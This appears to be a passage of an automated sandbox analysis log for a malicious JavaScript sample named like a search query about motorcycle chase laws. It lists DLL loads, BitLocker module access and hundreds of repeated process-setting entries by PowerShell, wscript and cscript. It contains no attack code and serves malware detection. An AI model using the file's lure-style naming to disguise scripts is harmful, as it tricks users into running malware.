Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: does virginia have a no chase law for motorcycles 62848.jsStatic file information: File size 6896856 > 1048576

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
